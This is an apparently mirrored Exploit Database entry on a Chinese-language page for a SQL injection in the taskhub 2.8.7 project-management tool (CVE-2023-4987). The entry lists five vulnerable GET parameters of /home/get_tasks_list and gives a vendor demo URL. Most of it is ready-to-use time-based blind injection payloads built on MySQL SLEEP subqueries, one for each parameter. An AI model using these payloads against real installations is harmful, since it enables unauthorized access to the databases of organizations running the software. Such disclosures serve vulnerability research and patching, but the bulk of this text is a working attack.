taskhub 2.8.7 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： CraCkEr
  日期： 2024-02-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51810/

• # Exploit Title: taskhub 2.8.7 - SQL Injection
  # Exploit Author: CraCkEr
  # Date: 05/09/2023
  # Vendor: Infinitie Technologies
  # Vendor Homepage: https://www.infinitietech.com/
  # Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
  # Demo: https://taskhub.company/auth
  # Tested on: Windows 10 Pro
  # Impact: Database Access
  # CVE: CVE-2023-4987
  # CWE: CWE-89 - CWE-74 - CWE-707
  
  
  ## Greetings
  
  The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
  CryptoJob (Twitter) twitter.com/0x0CryptoJob
  
  
  ## Description
  
  SQL injection attacks can allow unauthorized access to sensitive data, modification of
  data and crash the application or make it unavailable, leading to lost revenue and
  damage to a company's reputation.
  
  
  Path: /home/get_tasks_list
  
  GET parameter 'project' is vulnerable to SQL Injection
  GET parameter 'status' is vulnerable to SQL Injection
  GET parameter 'user_id' is vulnerable to SQL Injection
  GET parameter 'sort' is vulnerable to SQL Injection
  GET parameter 'search' is vulnerable to SQL Injection
  
  
  https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]
  
  
  ---
  Parameter: project (GET)
  Type: time-based blind
  Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
  Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
  
  Parameter: status (GET)
  Type: time-based blind
  Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
  Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
  
  Parameter: user_id (GET)
  Type: time-based blind
  Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
  Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
  
  Parameter: sort (GET)
  Type: time-based blind
  Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
  Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=
  
  Parameter: search (GET)
  Type: time-based blind
  Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
  Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
  ---
  
  
  [-] Done